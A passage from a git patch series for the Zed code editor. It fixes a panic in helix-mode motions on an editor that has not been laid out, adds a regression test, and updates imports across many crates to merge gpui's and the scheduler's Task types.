which is narrow but not impossible (since it's dispatched by the workspace, not the editor). Release Notes: - Fixed a rare panic when invoking helix motions on an editor that had not yet been laid out. --- crates/editor/src/editor.rs | 2 +- crates/vim/src/helix.rs | 55 +++++++++++++++++++++++++++++++++++++ 2 files changed, 56 insertions(+), 1 deletion(-) diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index 649ffbfae8aa8f..7d68b02d4e2af1 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -5985,7 +5985,7 @@ impl Editor { pub fn text_layout_details(&self, window: &mut Window, cx: &mut App) -> TextLayoutDetails { TextLayoutDetails { text_system: window.text_system().clone(), - editor_style: self.style.clone().unwrap(), + editor_style: self.style.clone().unwrap_or_else(|| self.create_style(cx)), rem_size: window.rem_size(), scroll_anchor: self.scroll_manager.shared_scroll_anchor(cx), visible_rows: self.visible_line_count(), diff --git a/crates/vim/src/helix.rs b/crates/vim/src/helix.rs index d61b0547aef5ce..544a19167ac905 100644 --- a/crates/vim/src/helix.rs +++ b/crates/vim/src/helix.rs @@ -2960,6 +2960,61 @@ mod test { cx.assert_state("«ˇone» two three", Mode::HelixSelect); } + // Regression test for ZED-758: helix motions called + // `Editor::text_layout_details` on an editor whose `style` had never + // been set, panicking on `unwrap()`. + #[gpui::test] + async fn test_helix_motion_on_unrendered_editor(cx: &mut gpui::TestAppContext) { + use editor::{Editor, EditorMode, SelectionEffects}; + use multi_buffer::{MultiBuffer, MultiBufferOffset}; + + VimTestContext::init(cx); + cx.update(|cx| { + VimTestContext::init_keybindings(true, cx); + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |s| { + s.vim_mode = Some(true); + s.helix_mode = Some(true); + }); + }); + }); + + let cx = cx.add_empty_window(); + + let editor = cx.update(|window, cx| { + use gpui::AppContext as _; + let buffer = MultiBuffer::build_simple("one two three", cx); + cx.new(|cx| { + let mut editor = Editor::new(EditorMode::full(), buffer, None, window, cx); + editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { + s.select_ranges([MultiBufferOffset(4)..MultiBufferOffset(4)]) + }); + editor + }) + }); + + let vim = editor + .read_with(cx, |editor, _| editor.addon::().cloned()) + .expect("VimAddon should be auto-attached to new editors when vim mode is enabled"); + + cx.update(|window, cx| { + vim.entity.update(cx, |vim, cx| { + vim.switch_mode(Mode::HelixNormal, true, window, cx); + vim.helix_move_and_collapse(crate::motion::Motion::Left, None, window, cx); + }); + }); + + let cursor_offset = cx.update(|_, cx| { + editor.update(cx, |editor, cx| { + editor + .selections + .newest::(&editor.display_snapshot(cx)) + .head() + }) + }); + assert_eq!(cursor_offset, MultiBufferOffset(3)); + } + #[gpui::test] async fn test_helix_select_regex(cx: &mut gpui::TestAppContext) { let mut cx = VimTestContext::new(cx, true).await; From 63e3e62f6d84323ba14cc6d7317da70dbda328ce Mon Sep 17 00:00:00 2001 From: Conrad Irwin Date: Tue, 5 May 2026 16:41:13 -0600 Subject: [PATCH 214/231] Merge gpui::Task and scheduler::Task (#53674) Release Notes: - N/A or Added/Fixed/Improved ... --- crates/agent/src/agent.rs | 2 +- crates/agent_ui/src/agent_configuration.rs | 2 +- .../add_llm_provider_modal.rs | 2 +- .../configure_context_server_modal.rs | 3 +- crates/agent_ui/src/agent_diff.rs | 2 +- crates/agent_ui/src/agent_panel.rs | 2 +- crates/agent_ui/src/conversation_view.rs | 2 +- .../src/conversation_view/thread_view.rs | 1 + crates/agent_ui/src/inline_assistant.rs | 4 +- crates/agent_ui/src/message_editor.rs | 3 +- crates/agent_ui/src/model_selector.rs | 2 +- crates/agent_ui/src/thread_import.rs | 2 +- crates/agent_ui/src/thread_metadata_store.rs | 2 +- crates/agent_ui/src/threads_archive_view.rs | 3 +- crates/agent_ui/src/ui/mention_crease.rs | 3 +- crates/ai_onboarding/src/ai_onboarding.rs | 2 +- crates/auto_update/src/auto_update.rs | 4 +- crates/auto_update_ui/src/auto_update_ui.rs | 3 +- crates/call/src/call_impl/mod.rs | 2 +- crates/call/src/call_impl/room.rs | 2 +- crates/client/src/client.rs | 2 +- crates/client/src/llm_token.rs | 1 + crates/client/src/user.rs | 3 +- .../random_project_collaboration_tests.rs | 2 +- .../src/collab_panel/channel_modal.rs | 3 +- .../incoming_call_notification.rs | 2 +- .../project_shared_notification.rs | 2 +- crates/command_palette/src/command_palette.rs | 2 +- .../src/copilot_edit_prediction_delegate.rs | 2 +- crates/copilot_chat/src/copilot_chat.rs | 1 + crates/copilot_ui/src/sign_in.rs | 2 +- crates/debugger_tools/src/dap_log.rs | 3 +- crates/debugger_ui/src/attach_modal.rs | 2 +- crates/debugger_ui/src/debugger_panel.rs | 2 +- crates/debugger_ui/src/debugger_ui.rs | 2 +- crates/debugger_ui/src/new_process_modal.rs | 2 +- crates/debugger_ui/src/session/running.rs | 2 +- .../src/session/running/stack_frame_list.rs | 2 +- .../src/session/running/variable_list.rs | 5 +- crates/diagnostics/src/buffer_diagnostics.rs | 2 +- crates/edit_prediction/src/edit_prediction.rs | 1 + crates/edit_prediction/src/mercury.rs | 2 +- crates/edit_prediction/src/ollama.rs | 2 +- crates/edit_prediction/src/zeta.rs | 2 +- .../src/edit_prediction_context.rs | 4 +- .../src/edit_prediction_button.rs | 2 +- .../src/edit_prediction_ui.rs | 1 + crates/editor/src/clangd_ext.rs | 2 +- crates/editor/src/code_context_menus.rs | 4 +- crates/editor/src/code_lens.rs | 2 +- crates/editor/src/editor_tests.rs | 4 +- crates/editor/src/element.rs | 6 +- crates/editor/src/hover_popover.rs | 4 +- crates/editor/src/rust_analyzer_ext.rs | 2 +- crates/extension_host/src/extension_host.rs | 4 +- .../src/extension_store_test.rs | 2 +- crates/extensions_ui/src/extensions_ui.rs | 2 +- crates/file_finder/src/file_finder.rs | 2 +- crates/git_ui/src/branch_picker.rs | 2 +- crates/git_ui/src/git_panel.rs | 4 +- crates/git_ui/src/git_ui.rs | 2 +- crates/git_ui/src/stash_picker.rs | 2 +- crates/git_ui/src/worktree_picker.rs | 4 +- crates/git_ui/src/worktree_service.rs | 2 +- crates/gpui/src/executor.rs | 106 ++++-------------- crates/gpui/src/prelude.rs | 2 +- crates/inspector_ui/src/inspector.rs | 2 +- crates/journal/src/journal.rs | 2 +- .../language_models/src/provider/anthropic.rs | 2 +- .../language_models/src/provider/bedrock.rs | 3 +- crates/language_models/src/provider/cloud.rs | 2 +- .../language_models/src/provider/deepseek.rs | 2 +- crates/language_models/src/provider/google.rs | 2 +- .../language_models/src/provider/lmstudio.rs | 2 +- .../language_models/src/provider/mistral.rs | 2 +- crates/language_models/src/provider/ollama.rs | 2 +- .../language_models/src/provider/open_ai.rs | 2 +- .../src/provider/open_ai_compatible.rs | 2 +- .../src/provider/open_router.rs | 2 +- .../language_models/src/provider/opencode.rs | 2 +- .../src/provider/vercel_ai_gateway.rs | 2 +- crates/language_models/src/provider/x_ai.rs | 2 +- .../src/language_selector.rs | 2 +- crates/language_tools/src/lsp_button.rs | 2 +- crates/onboarding/src/basics_page.rs | 2 +- crates/outline_panel/src/outline_panel.rs | 2 +- crates/project/src/agent_registry_store.rs | 2 +- crates/project/src/agent_server_store.rs | 2 +- crates/project/src/buffer_store.rs | 3 +- crates/project/src/context_server_store.rs | 4 +- crates/project/src/debugger/dap_store.rs | 2 +- crates/project/src/debugger/session.rs | 2 +- crates/project/src/git_store.rs | 2 +- crates/project/src/lsp_command.rs | 2 +- crates/project/src/lsp_store.rs | 2 +- crates/project/src/lsp_store/log_store.rs | 4 +- crates/project/src/project.rs | 2 +- crates/project/src/worktree_store.rs | 2 +- crates/project_benchmarks/src/main.rs | 1 + crates/project_symbols/src/project_symbols.rs | 4 +- crates/recent_projects/src/recent_projects.rs | 2 +- crates/recent_projects/src/remote_servers.rs | 2 +- .../src/sidebar_recent_projects.rs | 2 +- crates/remote/src/remote_client.rs | 2 +- crates/remote_server/src/headless_project.rs | 2 +- crates/repl/src/notebook/notebook_ui.rs | 2 +- crates/repl/src/repl_sessions_ui.rs | 2 +- crates/repl/src/repl_store.rs | 4 +- crates/rules_library/src/rules_library.rs | 2 +- crates/search/src/buffer_search.rs | 2 +- crates/search/src/project_search.rs | 3 +- .../pages/edit_prediction_provider_setup.rs | 2 +- crates/sidebar/src/sidebar.rs | 4 +- crates/snippets_ui/src/snippets_ui.rs | 2 +- crates/tab_switcher/src/tab_switcher.rs | 2 +- crates/task/src/static_source.rs | 2 +- crates/tasks_ui/src/tasks_ui.rs | 2 +- crates/terminal_view/src/terminal_panel.rs | 4 +- .../src/terminal_path_like_target.rs | 2 +- crates/terminal_view/src/terminal_view.rs | 4 +- crates/title_bar/src/collab.rs | 4 +- crates/title_bar/src/onboarding_banner.rs | 2 +- crates/title_bar/src/title_bar.rs | 2 +- crates/ui/src/components/context_menu.rs | 2 +- crates/vim/src/command.rs | 3 +- crates/vim/src/helix.rs | 2 +- crates/vim/src/normal.rs | 2 +- crates/vim/src/normal/mark.rs | 2 +- crates/vim/src/normal/search.rs | 2 +- crates/vim/src/state.rs | 3 +- crates/workspace/src/item.rs | 2 +- crates/workspace/src/multi_workspace.rs | 4 +- crates/workspace/src/pane.rs | 4 +- crates/workspace/src/persistence.rs | 1 + crates/workspace/src/tasks.rs | 2 +- crates/workspace/src/welcome.rs | 2 +- crates/workspace/src/workspace.rs | 4 +- crates/zed/src/main.rs | 4 +- crates/zed/src/reliability.rs | 2 +- crates/zed/src/zed.rs | 2 +- crates/zed/src/zed/open_listener.rs | 2 +- .../zed/src/zed/quick_action_bar/repl_menu.rs | 1 + crates/zed/src/zed/remote_debug.rs | 105 ++++++++--------- 143 files changed, 256 insertions(+), 291 deletions(-) diff --git a/crates/agent/src/agent.rs b/crates/agent/src/agent.rs index 1a7aaffb58053d..95b79a0cc153bd 100644 --- a/crates/agent/src/agent.rs +++ b/crates/agent/src/agent.rs @@ -37,7 +37,7 @@ use futures::future::Shared; use futures::{FutureExt as _, StreamExt as _, future}; use gpui::{ App, AppContext, AsyncApp, Context, Entity, EntityId, SharedString, Subscription, Task, - WeakEntity, + TaskExt, WeakEntity, }; use language_model::{IconOrSvg, LanguageModel, LanguageModelProvider, LanguageModelRegistry}; use project::{AgentId, Project, ProjectItem, ProjectPath, Worktree}; diff --git a/crates/agent_ui/src/agent_configuration.rs b/crates/agent_ui/src/agent_configuration.rs index da0704889e7fb9..39b1302555bebf 100644 --- a/crates/agent_ui/src/agent_configuration.rs +++ b/crates/agent_ui/src/agent_configuration.rs @@ -17,7 +17,7 @@ use extension_host::ExtensionStore; use fs::Fs; use gpui::{ Action, Anchor, AnyView, App, AsyncWindowContext, Entity, EventEmitter, FocusHandle, Focusable, - ScrollHandle, Subscription, Task, WeakEntity, + ScrollHandle, Subscription, Task, TaskExt, WeakEntity, }; use itertools::Itertools; use language::LanguageRegistry; diff --git a/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs b/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs index 1cff19c7cf4b3e..8eeda6447e878d 100644 --- a/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs +++ b/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs @@ -4,7 +4,7 @@ use anyhow::Result; use collections::HashSet; use fs::Fs; use gpui::{ - DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, Render, ScrollHandle, Task, + DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, Render, ScrollHandle, Task, TaskExt, }; use language_model::LanguageModelRegistry; use language_models::provider::open_ai_compatible::{AvailableModel, ModelCapabilities}; diff --git a/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs b/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs index 465d31b416e9e8..48d01e506bf423 100644 --- a/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs +++ b/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs @@ -5,7 +5,8 @@ use editor::{Editor, EditorElement, EditorStyle}; use gpui::{ AsyncWindowContext, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, ScrollHandle, - Subscription, Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*, + Subscription, Task, TaskExt, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, + prelude::*, }; use language::{Language, LanguageRegistry}; use markdown::{Markdown, MarkdownElement, MarkdownStyle}; diff --git a/crates/agent_ui/src/agent_diff.rs b/crates/agent_ui/src/agent_diff.rs index 4a5771fd9810fe..6f4e900be4245d 100644 --- a/crates/agent_ui/src/agent_diff.rs +++ b/crates/agent_ui/src/agent_diff.rs @@ -15,7 +15,7 @@ use editor::{ use gpui::{ Action, AnyElement, App, AppContext, Empty, Entity, EventEmitter, FocusHandle, Focusable, - Global, SharedString, Subscription, Task, WeakEntity, Window, prelude::*, + Global, SharedString, Subscription, Task, TaskExt, WeakEntity, Window, prelude::*, }; use language::{Buffer, Capability, OffsetRangeExt, Point}; diff --git a/crates/agent_ui/src/agent_panel.rs b/crates/agent_ui/src/agent_panel.rs index 8285da9e113e92..921d1347ffb6c3 100644 --- a/crates/agent_ui/src/agent_panel.rs +++ b/crates/agent_ui/src/agent_panel.rs @@ -60,7 +60,7 @@ use fs::Fs; use gpui::{ Action, Anchor, Animation, AnimationExt, AnyElement, App, AsyncWindowContext, ClipboardItem, Entity, EventEmitter, ExternalPaths, FocusHandle, Focusable, KeyContext, Pixels, Subscription, - Task, UpdateGlobal, WeakEntity, prelude::*, pulsating_between, + Task, TaskExt, UpdateGlobal, WeakEntity, prelude::*, pulsating_between, }; use language::LanguageRegistry; use language_model::LanguageModelRegistry; diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index c01d8d8c04ccbd..9dd97975a184ee 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -31,7 +31,7 @@ use futures::FutureExt as _; use gpui::{ Action, Animation, AnimationExt, AnyView, App, ClickEvent, ClipboardItem, CursorStyle, ElementId, Empty, Entity, EventEmitter, FocusHandle, Focusable, Hsla, ListOffset, ListState, - ObjectFit, PlatformDisplay, ScrollHandle, SharedString, Subscription, Task, TextStyle, + ObjectFit, PlatformDisplay, ScrollHandle, SharedString, Subscription, Task, TaskExt, TextStyle, WeakEntity, Window, WindowHandle, div, ease_in_out, img, linear_color_stop, linear_gradient, list, point, pulsating_between, }; diff --git a/crates/agent_ui/src/conversation_view/thread_view.rs b/crates/agent_ui/src/conversation_view/thread_view.rs index 0e0b3d04a8dbc6..c8971392941589 100644 --- a/crates/agent_ui/src/conversation_view/thread_view.rs +++ b/crates/agent_ui/src/conversation_view/thread_view.rs @@ -13,6 +13,7 @@ use feature_flags::AcpBetaFeatureFlag; use crate::message_editor::SharedSessionCapabilities; use gpui::List; +use gpui::TaskExt; use heapless::Vec as ArrayVec; use language_model::{LanguageModelEffortLevel, Speed}; use settings::{SidebarSide, update_settings_file}; diff --git a/crates/agent_ui/src/inline_assistant.rs b/crates/agent_ui/src/inline_assistant.rs index d442a61e01ae1d..b13a9b615b6f45 100644 --- a/crates/agent_ui/src/inline_assistant.rs +++ b/crates/agent_ui/src/inline_assistant.rs @@ -35,8 +35,8 @@ use editor::{ use fs::Fs; use futures::{FutureExt, channel::mpsc}; use gpui::{ - App, Context, Entity, Focusable, Global, HighlightStyle, Subscription, Task, UpdateGlobal, - WeakEntity, Window, point, + App, Context, Entity, Focusable, Global, HighlightStyle, Subscription, Task, TaskExt, + UpdateGlobal, WeakEntity, Window, point, }; use language::{Buffer, Point, Selection, TransactionId}; use language_model::{ConfigurationError, ConfiguredModel, LanguageModelRegistry}; diff --git a/crates/agent_ui/src/message_editor.rs b/crates/agent_ui/src/message_editor.rs index d839e87d98ee91..16f69b297cf8b5 100644 --- a/crates/agent_ui/src/message_editor.rs +++ b/crates/agent_ui/src/message_editor.rs @@ -22,7 +22,8 @@ use editor::{ use futures::{FutureExt as _, future::join_all}; use gpui::{ AppContext, ClipboardEntry, ClipboardItem, Context, Entity, EventEmitter, FocusHandle, - Focusable, ImageFormat, KeyContext, SharedString, Subscription, Task, TextStyle, WeakEntity, + Focusable, ImageFormat, KeyContext, SharedString, Subscription, Task, TaskExt, TextStyle, + WeakEntity, }; use language::{Buffer, language_settings::InlayHintKind}; use parking_lot::RwLock; diff --git a/crates/agent_ui/src/model_selector.rs b/crates/agent_ui/src/model_selector.rs index e1cf7307394571..4717197949673a 100644 --- a/crates/agent_ui/src/model_selector.rs +++ b/crates/agent_ui/src/model_selector.rs @@ -11,7 +11,7 @@ use futures::FutureExt; use fuzzy::{StringMatchCandidate, match_strings}; use gpui::{ Action, AsyncWindowContext, BackgroundExecutor, DismissEvent, FocusHandle, Subscription, Task, - WeakEntity, + TaskExt, WeakEntity, }; use itertools::Itertools; use ordered_float::OrderedFloat; diff --git a/crates/agent_ui/src/thread_import.rs b/crates/agent_ui/src/thread_import.rs index f5d6fa1a657d2f..1bee86602ed9ed 100644 --- a/crates/agent_ui/src/thread_import.rs +++ b/crates/agent_ui/src/thread_import.rs @@ -9,7 +9,7 @@ use fs::Fs; use futures::FutureExt as _; use gpui::{ App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, MouseDownEvent, - Render, SharedString, Task, WeakEntity, Window, + Render, SharedString, Task, TaskExt, WeakEntity, Window, }; use itertools::Itertools as _; use notifications::status_toast::StatusToast; diff --git a/crates/agent_ui/src/thread_metadata_store.rs b/crates/agent_ui/src/thread_metadata_store.rs index 2e6c3313eba11a..00d132f5a36e36 100644 --- a/crates/agent_ui/src/thread_metadata_store.rs +++ b/crates/agent_ui/src/thread_metadata_store.rs @@ -20,7 +20,7 @@ use db::{ }; use fs::Fs; use futures::{FutureExt, future::Shared}; -use gpui::{AppContext as _, Entity, Global, Subscription, Task}; +use gpui::{AppContext as _, Entity, Global, Subscription, Task, TaskExt}; pub use project::WorktreePaths; use project::{AgentId, linked_worktree_short_name}; use remote::{RemoteConnectionOptions, same_remote_connection_identity}; diff --git a/crates/agent_ui/src/threads_archive_view.rs b/crates/agent_ui/src/threads_archive_view.rs index 8283692887601c..5da5526b3df368 100644 --- a/crates/agent_ui/src/threads_archive_view.rs +++ b/crates/agent_ui/src/threads_archive_view.rs @@ -19,7 +19,8 @@ use fs::Fs; use fuzzy::{StringMatch, StringMatchCandidate}; use gpui::{ AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - ListState, Render, SharedString, Subscription, Task, WeakEntity, Window, list, prelude::*, px, + ListState, Render, SharedString, Subscription, Task, TaskExt, WeakEntity, Window, list, + prelude::*, px, }; use itertools::Itertools as _; use menu::{Confirm, SelectFirst, SelectLast, SelectNext, SelectPrevious}; diff --git a/crates/agent_ui/src/ui/mention_crease.rs b/crates/agent_ui/src/ui/mention_crease.rs index e3059ab87247dd..236e57ddffb1e5 100644 --- a/crates/agent_ui/src/ui/mention_crease.rs +++ b/crates/agent_ui/src/ui/mention_crease.rs @@ -4,7 +4,8 @@ use acp_thread::MentionUri; use agent_client_protocol::schema as acp; use editor::{Editor, SelectionEffects, scroll::Autoscroll}; use gpui::{ - Animation, AnimationExt, AnyView, Context, IntoElement, WeakEntity, Window, pulsating_between, + Animation, AnimationExt, AnyView, Context, IntoElement, TaskExt, WeakEntity, Window, + pulsating_between, }; use prompt_store::PromptId; use rope::Point; diff --git a/crates/ai_onboarding/src/ai_onboarding.rs b/crates/ai_onboarding/src/ai_onboarding.rs index 147458923045c1..bc1dabefd28cc5 100644 --- a/crates/ai_onboarding/src/ai_onboarding.rs +++ b/crates/ai_onboarding/src/ai_onboarding.rs @@ -16,7 +16,7 @@ pub use young_account_banner::YoungAccountBanner; use std::sync::Arc; use client::{Client, UserStore, zed_urls}; -use gpui::{AnyElement, Entity, IntoElement, ParentElement}; +use gpui::{AnyElement, Entity, IntoElement, ParentElement, TaskExt}; use ui::{Divider, RegisterComponent, Tooltip, Vector, VectorName, prelude::*}; #[derive(PartialEq)] diff --git a/crates/auto_update/src/auto_update.rs b/crates/auto_update/src/auto_update.rs index a057a30c6d37e9..c1b15aa3b6c371 100644 --- a/crates/auto_update/src/auto_update.rs +++ b/crates/auto_update/src/auto_update.rs @@ -3,8 +3,8 @@ use client::Client; use db::kvp::KeyValueStore; use futures_lite::StreamExt; use gpui::{ - App, AppContext as _, AsyncApp, BackgroundExecutor, Context, Entity, Global, Task, Window, - actions, + App, AppContext as _, AsyncApp, BackgroundExecutor, Context, Entity, Global, Task, TaskExt, + Window, actions, }; use http_client::{HttpClient, HttpClientWithUrl}; use paths::remote_servers_dir; diff --git a/crates/auto_update_ui/src/auto_update_ui.rs b/crates/auto_update_ui/src/auto_update_ui.rs index 77ba83597edf4e..6bd577ddb1bd24 100644 --- a/crates/auto_update_ui/src/auto_update_ui.rs +++ b/crates/auto_update_ui/src/auto_update_ui.rs @@ -6,7 +6,8 @@ use db::kvp::Dismissable; use editor::{Editor, MultiBuffer}; use fs::Fs; use gpui::{ - App, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, Window, actions, prelude::*, + App, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, TaskExt, Window, actions, + prelude::*, }; use markdown_preview::markdown_preview_view::{MarkdownPreviewMode, MarkdownPreviewView}; use notifications::status_toast::StatusToast; diff --git a/crates/call/src/call_impl/mod.rs b/crates/call/src/call_impl/mod.rs index c0c1535cd45684..eabc214b11527b 100644 --- a/crates/call/src/call_impl/mod.rs +++ b/crates/call/src/call_impl/mod.rs @@ -9,7 +9,7 @@ use collections::HashSet; use futures::{Future, FutureExt, channel::oneshot, future::Shared}; use gpui::{ AnyView, App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, - WeakEntity, Window, + TaskExt, WeakEntity, Window, }; use postage::watch; use project::Project; diff --git a/crates/call/src/call_impl/room.rs b/crates/call/src/call_impl/room.rs index f9df2b758f7664..658c2b620643f5 100644 --- a/crates/call/src/call_impl/room.rs +++ b/crates/call/src/call_impl/room.rs @@ -14,7 +14,7 @@ use fs::Fs; use futures::StreamExt; use gpui::{ App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, FutureExt as _, - ScreenCaptureSource, ScreenCaptureStream, Task, Timeout, WeakEntity, + ScreenCaptureSource, ScreenCaptureStream, Task, TaskExt, Timeout, WeakEntity, }; use gpui_tokio::Tokio; use language::LanguageRegistry; diff --git a/crates/client/src/client.rs b/crates/client/src/client.rs index 5bc34320a87e1a..fc3c5126774048 100644 --- a/crates/client/src/client.rs +++ b/crates/client/src/client.rs @@ -26,7 +26,7 @@ use futures::{ future::BoxFuture, stream::BoxStream, }; -use gpui::{App, AsyncApp, Entity, Global, Task, WeakEntity, actions}; +use gpui::{App, AsyncApp, Entity, Global, Task, TaskExt, WeakEntity, actions}; use http_client::{HttpClient, HttpClientWithUrl, http, read_proxy_from_env}; use parking_lot::{Mutex, RwLock}; use postage::watch; diff --git a/crates/client/src/llm_token.rs b/crates/client/src/llm_token.rs index 70457679e4b965..058be7905fa12d 100644 --- a/crates/client/src/llm_token.rs +++ b/crates/client/src/llm_token.rs @@ -4,6 +4,7 @@ use cloud_api_types::websocket_protocol::MessageToClient; use cloud_llm_client::{EXPIRED_LLM_TOKEN_HEADER_NAME, OUTDATED_LLM_TOKEN_HEADER_NAME}; use gpui::{ App, AppContext as _, Context, Entity, EventEmitter, Global, ReadGlobal as _, Subscription, + TaskExt, }; use std::sync::Arc; diff --git a/crates/client/src/user.rs b/crates/client/src/user.rs index 0f43690491387e..3673393631d3c2 100644 --- a/crates/client/src/user.rs +++ b/crates/client/src/user.rs @@ -15,7 +15,8 @@ use derive_more::Deref; use feature_flags::FeatureFlagAppExt; use futures::{Future, StreamExt, channel::mpsc}; use gpui::{ - App, AsyncApp, Context, Entity, EventEmitter, SharedString, SharedUri, Task, WeakEntity, + App, AsyncApp, Context, Entity, EventEmitter, SharedString, SharedUri, Task, TaskExt, + WeakEntity, }; use http_client::http::{HeaderMap, HeaderValue}; use postage::{sink::Sink, watch}; diff --git a/crates/collab/tests/integration/random_project_collaboration_tests.rs b/crates/collab/tests/integration/random_project_collaboration_tests.rs index ab5bde6d3215fa..a7eaa9cd60f116 100644 --- a/crates/collab/tests/integration/random_project_collaboration_tests.rs +++ b/crates/collab/tests/integration/random_project_collaboration_tests.rs @@ -7,7 +7,7 @@ use collections::{BTreeMap, HashMap}; use editor::Bias; use fs::{FakeFs, Fs as _}; use git::status::{FileStatus, StatusCode, TrackedStatus, UnmergedStatus, UnmergedStatusCode}; -use gpui::{BackgroundExecutor, Entity, TestAppContext}; +use gpui::{BackgroundExecutor, Entity, TaskExt, TestAppContext}; use language::{ FakeLspAdapter, Language, LanguageConfig, LanguageMatcher, PointUtf16, range_to_lsp, }; diff --git a/crates/collab_ui/src/collab_panel/channel_modal.rs b/crates/collab_ui/src/collab_panel/channel_modal.rs index 1781a8e93e0476..befe7703e65ae6 100644 --- a/crates/collab_ui/src/collab_panel/channel_modal.rs +++ b/crates/collab_ui/src/collab_panel/channel_modal.rs @@ -6,7 +6,8 @@ use client::{ use fuzzy::{StringMatchCandidate, match_strings}; use gpui::{ App, ClipboardItem, Context, DismissEvent, Entity, EventEmitter, Focusable, ParentElement, - Render, Styled, Subscription, Task, WeakEntity, Window, actions, anchored, deferred, div, + Render, Styled, Subscription, Task, TaskExt, WeakEntity, Window, actions, anchored, deferred, + div, }; use picker::{Picker, PickerDelegate}; use std::sync::Arc; diff --git a/crates/collab_ui/src/notifications/incoming_call_notification.rs b/crates/collab_ui/src/notifications/incoming_call_notification.rs index 71940794f4180e..5a9628ac87d9ad 100644 --- a/crates/collab_ui/src/notifications/incoming_call_notification.rs +++ b/crates/collab_ui/src/notifications/incoming_call_notification.rs @@ -1,7 +1,7 @@ use crate::notification_window_options; use call::{ActiveCall, IncomingCall}; use futures::StreamExt; -use gpui::{App, WindowHandle, prelude::*}; +use gpui::{App, TaskExt, WindowHandle, prelude::*}; use std::sync::{Arc, Weak}; use ui::{CollabNotification, prelude::*}; diff --git a/crates/collab_ui/src/notifications/project_shared_notification.rs b/crates/collab_ui/src/notifications/project_shared_notification.rs index 3c231c5397af23..e39d1cd32a503f 100644 --- a/crates/collab_ui/src/notifications/project_shared_notification.rs +++ b/crates/collab_ui/src/notifications/project_shared_notification.rs @@ -2,7 +2,7 @@ use crate::notification_window_options; use call::{ActiveCall, room}; use client::User; use collections::HashMap; -use gpui::{App, Size}; +use gpui::{App, Size, TaskExt}; use std::sync::{Arc, Weak}; use ui::{CollabNotification, prelude::*}; diff --git a/crates/command_palette/src/command_palette.rs b/crates/command_palette/src/command_palette.rs index 68d04537a0261c..35af6f071be5de 100644 --- a/crates/command_palette/src/command_palette.rs +++ b/crates/command_palette/src/command_palette.rs @@ -16,7 +16,7 @@ use command_palette_hooks::{ use fuzzy_nucleo::{StringMatch, StringMatchCandidate}; use gpui::{ Action, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - ParentElement, Render, Styled, Task, WeakEntity, Window, + ParentElement, Render, Styled, Task, TaskExt, WeakEntity, Window, }; use persistence::CommandPaletteDB; use picker::Direction; diff --git a/crates/copilot/src/copilot_edit_prediction_delegate.rs b/crates/copilot/src/copilot_edit_prediction_delegate.rs index e789a89df65daf..4b75feafe4b38b 100644 --- a/crates/copilot/src/copilot_edit_prediction_delegate.rs +++ b/crates/copilot/src/copilot_edit_prediction_delegate.rs @@ -10,7 +10,7 @@ use edit_prediction_types::{ EditPrediction, EditPredictionDelegate, EditPredictionDiscardReason, EditPredictionIconSet, interpolate_edits, }; -use gpui::{App, Context, Entity, Task}; +use gpui::{App, Context, Entity, Task, TaskExt}; use icons::IconName; use language::{Anchor, Buffer, BufferSnapshot, EditPreview, OffsetRangeExt, ToPointUtf16}; use std::{ops::Range, sync::Arc, time::Duration}; diff --git a/crates/copilot_chat/src/copilot_chat.rs b/crates/copilot_chat/src/copilot_chat.rs index fb89c2e0853f73..ab5c08b617473f 100644 --- a/crates/copilot_chat/src/copilot_chat.rs +++ b/crates/copilot_chat/src/copilot_chat.rs @@ -9,6 +9,7 @@ use anyhow::{Result, anyhow}; use collections::HashSet; use fs::Fs; use futures::{AsyncBufReadExt, AsyncReadExt, StreamExt, io::BufReader, stream::BoxStream}; +use gpui::TaskExt; use gpui::WeakEntity; use gpui::{App, AsyncApp, Global, prelude::*}; use http_client::HttpRequestExt; diff --git a/crates/copilot_ui/src/sign_in.rs b/crates/copilot_ui/src/sign_in.rs index 09267020e5c359..f0408ea063a542 100644 --- a/crates/copilot_ui/src/sign_in.rs +++ b/crates/copilot_ui/src/sign_in.rs @@ -6,7 +6,7 @@ use copilot::{ use gpui::{ App, ClipboardItem, Context, DismissEvent, Element, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, IntoElement, MouseDownEvent, ParentElement, Render, Styled, - Subscription, Window, WindowBounds, WindowOptions, div, point, + Subscription, TaskExt, Window, WindowBounds, WindowOptions, div, point, }; use project::project_settings::ProjectSettings; use settings::Settings as _; diff --git a/crates/debugger_tools/src/dap_log.rs b/crates/debugger_tools/src/dap_log.rs index 749a6cd7888301..76d31bdd23221c 100644 --- a/crates/debugger_tools/src/dap_log.rs +++ b/crates/debugger_tools/src/dap_log.rs @@ -11,7 +11,8 @@ use futures::{ }; use gpui::{ App, AppContext, Context, Empty, Entity, EventEmitter, FocusHandle, Focusable, IntoElement, - ParentElement, Render, SharedString, Styled, Subscription, WeakEntity, Window, actions, div, + ParentElement, Render, SharedString, Styled, Subscription, TaskExt, WeakEntity, Window, + actions, div, }; use project::{ Project, diff --git a/crates/debugger_ui/src/attach_modal.rs b/crates/debugger_ui/src/attach_modal.rs index 